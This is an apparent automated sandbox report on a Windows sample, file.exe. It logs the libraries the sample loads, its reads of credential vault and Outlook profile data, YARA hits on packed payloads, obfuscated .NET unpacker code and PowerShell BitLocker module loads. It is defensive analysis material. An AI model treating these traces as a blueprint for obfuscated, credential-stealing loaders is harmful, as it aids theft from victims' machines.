Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.file.exe.70f0000.5.raw.unpack, KQkH3in3AYxtB1JkcI.cs	.Net Code: gHQexYK344 System.Reflection.Assembly.Load(byte[])
Source: 0.2.file.exe.381d400.3.raw.unpack, KQkH3in3AYxtB1JkcI.cs	.Net Code: gHQexYK344 System.Reflection.Assembly.Load(byte[])

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.file.exe.37bf1e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.37d9200.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7524, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 7716, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06748A90 pushfd ; retf	0_2_06748A91
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06748A92 pushad ; retf	0_2_06748A99
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00402AC0 push eax; ret	3_2_00402AD4
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00402AC0 push eax; ret	3_2_00402AFC

Source: file.exe

Static PE information: section name: .text entropy: 7.9227520273220895

Source: 0.2.file.exe.70f0000.5.raw.unpack, KQkH3in3AYxtB1JkcI.cs	High entropy of concatenated method names: 'gwb8vauN76', 'coJ8KZpJSC', 'fZs8T6XHIb', 'uqG8CFeqcY', 'Xrh8GBbB4F', 'F5A8QvMX8N', 'Mhg8iMMyDK', 'IwJ8nhpBnt', 'ppo8rHM5l3', 'zKB8VcEgFn'
Source: 0.2.file.exe.70f0000.5.raw.unpack, BDLA7ZzmjyZeMHspbI.cs	High entropy of concatenated method names: 'pYcc3qb4LP', 'iVMcFnRmTf', 'kjSch2OmFh', 'dPKcNtftA0', 'ep5cukejfW', 'DLtcmCOIuX', 'lWKctS9MXy', 'aH8c6uleZm', 'Py5cgNOThj', 'aoVcHMdwZP'
Source: 0.2.file.exe.70f0000.5.raw.unpack, dhK9KbNqZASI81hGMI.cs	High entropy of concatenated method names: 'sfGQv3qveH', 'Gk1QTJCxla', 'PF0QGPZ0c9', 'ecJQiiiaj1', 'k6KQn6iR71', 'XSqGYjTQNd', 'dr0GDj07xW', 'z70GSox8Zc', 'UUbGWZII6b', 'n2XGkeHKAq'
Source: 0.2.file.exe.70f0000.5.raw.unpack, eWbKPQURAh7q0dXmWQa.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g6Ics1b5Q4', 'lHScanO8Hq', 'nGHc7Kj1b4', 'Nkvc4EEFTo', 'W1ncOKfXll', 'RBGc1YrhiV', 'W60cEbFZA3'
Source: 0.2.file.exe.70f0000.5.raw.unpack, blpmsJDcqDTfApNEE9.cs	High entropy of concatenated method names: 'sXHIWBvUB1', 'gM3IXliyxi', 'LAkjRqtjrT', 'irsjUBXqk4', 'suWIscc6eO', 'adBIa4DbBY', 'bhgI7Ap3yt', 'JJPI44IQ2E', 'x1FIOfmaQo', 'J1LI18bvGD'
Source: 0.2.file.exe.70f0000.5.raw.unpack, asC2VyhwMrPC2xZIhl.cs	High entropy of concatenated method names: 'ARKCb4vRER', 'PfqC3SbNpI', 'gFNCFAwu0h', 'N7QChL3WU5', 'egwCMgpiYw', 'gXBCZhOmb9', 'HiyCI68I54', 'NnfCj0kphm', 'uQfCdb2Dm9', 'VKQCcjYmRN'
Source: 0.2.file.exe.70f0000.5.raw.unpack, rXxk4UXv0hG6nJr2r4.cs	High entropy of concatenated method names: 'NY8cCHPCTo', 'v1YcGMuL0j', 'PlDcQ98GnS', 'gHrci7Rn0Y', 'LTtcdZa6tk', 'WgxcnQGGAx', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.file.exe.70f0000.5.raw.unpack, wtca6eCuhSEXbwj87j.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NPhBk6IATb', 'NUrBXV5rDr', 'w4vBzP3VTO', 'Fum8R26vkD', 'BSQ8UGxs3m', 'FAr8ByJM0s', 'KyD88tXy3T', 'HwpHMYNZUsK33x2B4cE'
Source: 0.2.file.exe.70f0000.5.raw.unpack, Y1v65cTfYUkeaqQPAC.cs	High entropy of concatenated method names: 'Dispose', 'xaYUki41xL', 'hXyBuxl6Ko', 'sWJJotluKH', 'NwmUXu8WJh', 'n33Uzq0LEr', 'ProcessDialogKey', 'eg6BR76f1h', 'lmIBU3Lkqh', 'k4kBBdXxk4'
Source: 0.2.file.exe.70f0000.5.raw.unpack, Urg7ubUUcCev0u1dT4r.cs	High entropy of concatenated method names: 'x1jcXgXCGN', 'fvScz1QqAG', 'XKdfRDMKeD', 'LkffUlITX0', 'gnrfBIBAS5', 'AUdf8iyEhN', 'OqwfeZeTlt', 'XAwfvt7blr', 'PnmfKyehow', 'jKVfTiMyVU'
Source: 0.2.file.exe.70f0000.5.raw.unpack, e7gKPApuQs0EWyVG9T.cs	High entropy of concatenated method names: 'YtHQ1avdnI', 'sCKQEBr9Vg', 'RWkQYVTVi9', 'ToString', 'plbQDysEAl', 'QkLQSVFMsJ', 'tyg4QgZnFbC608q3Vvw', 'upiOboZCPTUWbVTJlXN', 'Gr55C2Z22jsqV8xooje'
Source: 0.2.file.exe.70f0000.5.raw.unpack, ywjJDxuXXl5HvcWFju.cs	High entropy of concatenated method names: 'jd1XQnZrwVnLTEDCpNd', 'KywlMNZsQBmADPfNGNl', 'EO5xIiZj2NflMbVFU0Z', 'bmHQjhGy3F', 'nonQdcl1E2', 'QAuQcAH5On', 'J0YoVWZ0gtheKhdG88p', 'Cx56OgZEqBuvdXaLqeJ', 'i4yDHfZGP0q4hERawKj'
Source: 0.2.file.exe.70f0000.5.raw.unpack, BE5k0LFu5KnoWIB8ne.cs	High entropy of concatenated method names: 'QPjT47v345', 'bMaTO5YD1n', 'qL4T1ROcj5', 'B15TEN4D6d', 'noKTY6WZW0', 'KIATDaS7hq', 'wqZTSXrG3c', 'UUKTWm9AvU', 'JPFTkkWlg3', 'zCGTXs1q8C'
Source: 0.2.file.exe.70f0000.5.raw.unpack, hlfKZ6407CBnHJSie5.cs	High entropy of concatenated method names: 'Q4eMPdDINF', 'dABMaa0v9G', 'm1iM46hmGb', 'F35MOwisjH', 'gV1MuYpY1I', 'NEEM9yiVrf', 'T49MmVVXB8', 'vepMttiwtX', 'mSgMp2U8YB', 'OrnM5Qgsgs'
Source: 0.2.file.exe.70f0000.5.raw.unpack, mO72Zbe7qFQORHthPZ.cs	High entropy of concatenated method names: 'IGyUiE5k0L', 'H5KUnnoWIB', 'BwMUVrPC2x', 'pIhUqlJdZP', 'PPIUMX2ehK', 'HKbUZqZASI', 'DrLniM6qODKrhYmosh', 'nIUaEjW6YOpveRetEf', 'lhUUUXaivS', 'm33U8VTlfn'
Source: 0.2.file.exe.70f0000.5.raw.unpack, BwnBSkUenCTHkiiG70o.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't9EwdUeNcg', 'GcswcCxhlR', 'javwf2GxHL', 'M0CwwEMwtd', 'Q2vw2fUeVe', 'b1uwLEqNHF', 'ty2w6esgdc'
Source: 0.2.file.exe.70f0000.5.raw.unpack, kvk9jqBMEXOK4a7rYr.cs	High entropy of concatenated method names: 'UuhxF135Y', 'XnebOGXXx', 'gxo3kDLoB', 'IZJ0qtrjN', 'ArxhXNkJK', 'HajJcBQ7r', 'n91mUTemEhJ9mZBp51', 'RNVkhEo862ysWOUwJ8', 'K5EjtOTxM', 'YgrcQvyG5'
Source: 0.2.file.exe.70f0000.5.raw.unpack, iWse1KSS7gaYi41xLP.cs	High entropy of concatenated method names: 'K0RdMuvAqt', 'BmMdIEKRT2', 'RJfddnVaQa', 'fcWdf4WTkd', 'FJpd2JdMAg', 'XKNd6ZbKD7', 'Dispose', 'S0pjKughCJ', 'Jr6jTQ28or', 'sGujCe3UVH'
Source: 0.2.file.exe.70f0000.5.raw.unpack, eqDwEc5eNbqOMrRccw.cs	High entropy of concatenated method names: 'wsUiKpO8LJ', 'mKeiCuOl5m', 'c76iQWyI7L', 'dG5QXo2Ph5', 's31QzmMPm6', 'tdCiRDR4Xc', 'uVniU0FJwJ', 'vCpiBNnNh2', 'C33i8WyDuh', 'C2FienmEHx'
Source: 0.2.file.exe.70f0000.5.raw.unpack, lBiWxolWI4mIKrpo6Q.cs	High entropy of concatenated method names: 'c6sigqBTbc', 'bA5iHPDRJZ', 'nVIix7HMEI', 'lu8ibUgJBG', 'xQBiyYxTKA', 'Uu3i30xC8r', 'tkNi0FhmID', 'g94iF3DidF', 'LljihX3H7C', 'EeQiJ9voDB'
Source: 0.2.file.exe.70f0000.5.raw.unpack, eenOKjUBoGmHCNGsevJ.cs	High entropy of concatenated method names: 'ToString', 'dynfFoMNSH', 'NPbfhRtonL', 'EsyfJMHbTy', 'SVXfNgrEu2', 'gXWfupVDI1', 'SHPf95laLM', 'jw8fm0999e', 'fKvmhvcqCxomhRmxrhd', 'yiGgBXc63lwjv54kfh4'
Source: 0.2.file.exe.70f0000.5.raw.unpack, urCQEP7xb0Mxs3L7dv.cs	High entropy of concatenated method names: 'RvKAFRNiNm', 'LurAhHQlM9', 'T4WANS9Td2', 'zsCAu6BpFD', 'rgOAmBGW2g', 'rqsAtd3WxD', 'soHA5yy9T5', 'ydbAoD9Y2p', 'hKxAPfH77o', 'nuVAs99LcQ'
Source: 0.2.file.exe.70f0000.5.raw.unpack, x76f1hkrmI3Lkqhn4k.cs	High entropy of concatenated method names: 'E0fdNAeGf6', 'b0Idu8bJEp', 'twmd91E48s', 'oKldmWYHus', 'MhbdtHQOm8', 'RPXdp8Pfdb', 'ArPd5HbWfX', 'Uw5doQYgDG', 'QX0dlENjSW', 'cr1dPT1aQr'
Source: 0.2.file.exe.381d400.3.raw.unpack, KQkH3in3AYxtB1JkcI.cs	High entropy of concatenated method names: 'gwb8vauN76', 'coJ8KZpJSC', 'fZs8T6XHIb', 'uqG8CFeqcY', 'Xrh8GBbB4F', 'F5A8QvMX8N', 'Mhg8iMMyDK', 'IwJ8nhpBnt', 'ppo8rHM5l3', 'zKB8VcEgFn'
Source: 0.2.file.exe.381d400.3.raw.unpack, BDLA7ZzmjyZeMHspbI.cs	High entropy of concatenated method names: 'pYcc3qb4LP', 'iVMcFnRmTf', 'kjSch2OmFh', 'dPKcNtftA0', 'ep5cukejfW', 'DLtcmCOIuX', 'lWKctS9MXy', 'aH8c6uleZm', 'Py5cgNOThj', 'aoVcHMdwZP'
Source: 0.2.file.exe.381d400.3.raw.unpack, dhK9KbNqZASI81hGMI.cs	High entropy of concatenated method names: 'sfGQv3qveH', 'Gk1QTJCxla', 'PF0QGPZ0c9', 'ecJQiiiaj1', 'k6KQn6iR71', 'XSqGYjTQNd', 'dr0GDj07xW', 'z70GSox8Zc', 'UUbGWZII6b', 'n2XGkeHKAq'
Source: 0.2.file.exe.381d400.3.raw.unpack, eWbKPQURAh7q0dXmWQa.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g6Ics1b5Q4', 'lHScanO8Hq', 'nGHc7Kj1b4', 'Nkvc4EEFTo', 'W1ncOKfXll', 'RBGc1YrhiV', 'W60cEbFZA3'
Source: 0.2.file.exe.381d400.3.raw.unpack, blpmsJDcqDTfApNEE9.cs	High entropy of concatenated method names: 'sXHIWBvUB1', 'gM3IXliyxi', 'LAkjRqtjrT', 'irsjUBXqk4', 'suWIscc6eO', 'adBIa4DbBY', 'bhgI7Ap3yt', 'JJPI44IQ2E', 'x1FIOfmaQo', 'J1LI18bvGD'
Source: 0.2.file.exe.381d400.3.raw.unpack, asC2VyhwMrPC2xZIhl.cs	High entropy of concatenated method names: 'ARKCb4vRER', 'PfqC3SbNpI', 'gFNCFAwu0h', 'N7QChL3WU5', 'egwCMgpiYw', 'gXBCZhOmb9', 'HiyCI68I54', 'NnfCj0kphm', 'uQfCdb2Dm9', 'VKQCcjYmRN'
Source: 0.2.file.exe.381d400.3.raw.unpack, rXxk4UXv0hG6nJr2r4.cs	High entropy of concatenated method names: 'NY8cCHPCTo', 'v1YcGMuL0j', 'PlDcQ98GnS', 'gHrci7Rn0Y', 'LTtcdZa6tk', 'WgxcnQGGAx', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.file.exe.381d400.3.raw.unpack, wtca6eCuhSEXbwj87j.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NPhBk6IATb', 'NUrBXV5rDr', 'w4vBzP3VTO', 'Fum8R26vkD', 'BSQ8UGxs3m', 'FAr8ByJM0s', 'KyD88tXy3T', 'HwpHMYNZUsK33x2B4cE'
Source: 0.2.file.exe.381d400.3.raw.unpack, Y1v65cTfYUkeaqQPAC.cs	High entropy of concatenated method names: 'Dispose', 'xaYUki41xL', 'hXyBuxl6Ko', 'sWJJotluKH', 'NwmUXu8WJh', 'n33Uzq0LEr', 'ProcessDialogKey', 'eg6BR76f1h', 'lmIBU3Lkqh', 'k4kBBdXxk4'
Source: 0.2.file.exe.381d400.3.raw.unpack, Urg7ubUUcCev0u1dT4r.cs	High entropy of concatenated method names: 'x1jcXgXCGN', 'fvScz1QqAG', 'XKdfRDMKeD', 'LkffUlITX0', 'gnrfBIBAS5', 'AUdf8iyEhN', 'OqwfeZeTlt', 'XAwfvt7blr', 'PnmfKyehow', 'jKVfTiMyVU'
Source: 0.2.file.exe.381d400.3.raw.unpack, e7gKPApuQs0EWyVG9T.cs	High entropy of concatenated method names: 'YtHQ1avdnI', 'sCKQEBr9Vg', 'RWkQYVTVi9', 'ToString', 'plbQDysEAl', 'QkLQSVFMsJ', 'tyg4QgZnFbC608q3Vvw', 'upiOboZCPTUWbVTJlXN', 'Gr55C2Z22jsqV8xooje'
Source: 0.2.file.exe.381d400.3.raw.unpack, ywjJDxuXXl5HvcWFju.cs	High entropy of concatenated method names: 'jd1XQnZrwVnLTEDCpNd', 'KywlMNZsQBmADPfNGNl', 'EO5xIiZj2NflMbVFU0Z', 'bmHQjhGy3F', 'nonQdcl1E2', 'QAuQcAH5On', 'J0YoVWZ0gtheKhdG88p', 'Cx56OgZEqBuvdXaLqeJ', 'i4yDHfZGP0q4hERawKj'
Source: 0.2.file.exe.381d400.3.raw.unpack, BE5k0LFu5KnoWIB8ne.cs	High entropy of concatenated method names: 'QPjT47v345', 'bMaTO5YD1n', 'qL4T1ROcj5', 'B15TEN4D6d', 'noKTY6WZW0', 'KIATDaS7hq', 'wqZTSXrG3c', 'UUKTWm9AvU', 'JPFTkkWlg3', 'zCGTXs1q8C'
Source: 0.2.file.exe.381d400.3.raw.unpack, hlfKZ6407CBnHJSie5.cs	High entropy of concatenated method names: 'Q4eMPdDINF', 'dABMaa0v9G', 'm1iM46hmGb', 'F35MOwisjH', 'gV1MuYpY1I', 'NEEM9yiVrf', 'T49MmVVXB8', 'vepMttiwtX', 'mSgMp2U8YB', 'OrnM5Qgsgs'
Source: 0.2.file.exe.381d400.3.raw.unpack, mO72Zbe7qFQORHthPZ.cs	High entropy of concatenated method names: 'IGyUiE5k0L', 'H5KUnnoWIB', 'BwMUVrPC2x', 'pIhUqlJdZP', 'PPIUMX2ehK', 'HKbUZqZASI', 'DrLniM6qODKrhYmosh', 'nIUaEjW6YOpveRetEf', 'lhUUUXaivS', 'm33U8VTlfn'
Source: 0.2.file.exe.381d400.3.raw.unpack, BwnBSkUenCTHkiiG70o.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't9EwdUeNcg', 'GcswcCxhlR', 'javwf2GxHL', 'M0CwwEMwtd', 'Q2vw2fUeVe', 'b1uwLEqNHF', 'ty2w6esgdc'
Source: 0.2.file.exe.381d400.3.raw.unpack, kvk9jqBMEXOK4a7rYr.cs	High entropy of concatenated method names: 'UuhxF135Y', 'XnebOGXXx', 'gxo3kDLoB', 'IZJ0qtrjN', 'ArxhXNkJK', 'HajJcBQ7r', 'n91mUTemEhJ9mZBp51', 'RNVkhEo862ysWOUwJ8', 'K5EjtOTxM', 'YgrcQvyG5'
Source: 0.2.file.exe.381d400.3.raw.unpack, iWse1KSS7gaYi41xLP.cs	High entropy of concatenated method names: 'K0RdMuvAqt', 'BmMdIEKRT2', 'RJfddnVaQa', 'fcWdf4WTkd', 'FJpd2JdMAg', 'XKNd6ZbKD7', 'Dispose', 'S0pjKughCJ', 'Jr6jTQ28or', 'sGujCe3UVH'
Source: 0.2.file.exe.381d400.3.raw.unpack, eqDwEc5eNbqOMrRccw.cs	High entropy of concatenated method names: 'wsUiKpO8LJ', 'mKeiCuOl5m', 'c76iQWyI7L', 'dG5QXo2Ph5', 's31QzmMPm6', 'tdCiRDR4Xc', 'uVniU0FJwJ', 'vCpiBNnNh2', 'C33i8WyDuh', 'C2FienmEHx'
Source: 0.2.file.exe.381d400.3.raw.unpack, lBiWxolWI4mIKrpo6Q.cs	High entropy of concatenated method names: 'c6sigqBTbc', 'bA5iHPDRJZ', 'nVIix7HMEI', 'lu8ibUgJBG', 'xQBiyYxTKA', 'Uu3i30xC8r', 'tkNi0FhmID', 'g94iF3DidF', 'LljihX3H7C', 'EeQiJ9voDB'
Source: 0.2.file.exe.381d400.3.raw.unpack, eenOKjUBoGmHCNGsevJ.cs	High entropy of concatenated method names: 'ToString', 'dynfFoMNSH', 'NPbfhRtonL', 'EsyfJMHbTy', 'SVXfNgrEu2', 'gXWfupVDI1', 'SHPf95laLM', 'jw8fm0999e', 'fKvmhvcqCxomhRmxrhd', 'yiGgBXc63lwjv54kfh4'
Source: 0.2.file.exe.381d400.3.raw.unpack, urCQEP7xb0Mxs3L7dv.cs	High entropy of concatenated method names: 'RvKAFRNiNm', 'LurAhHQlM9', 'T4WANS9Td2', 'zsCAu6BpFD', 'rgOAmBGW2g', 'rqsAtd3WxD', 'soHA5yy9T5', 'ydbAoD9Y2p', 'hKxAPfH77o', 'nuVAs99LcQ'
Source: 0.2.file.exe.381d400.3.raw.unpack, x76f1hkrmI3Lkqhn4k.cs	High entropy of concatenated method names: 'E0fdNAeGf6', 'b0Idu8bJEp', 'twmd91E48s', 'oKldmWYHus', 'MhbdtHQOm8', 'RPXdp8Pfdb', 'ArPd5HbWfX', 'Uw5doQYgDG', 'QX0dlENjSW', 'cr1dPT1aQr'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
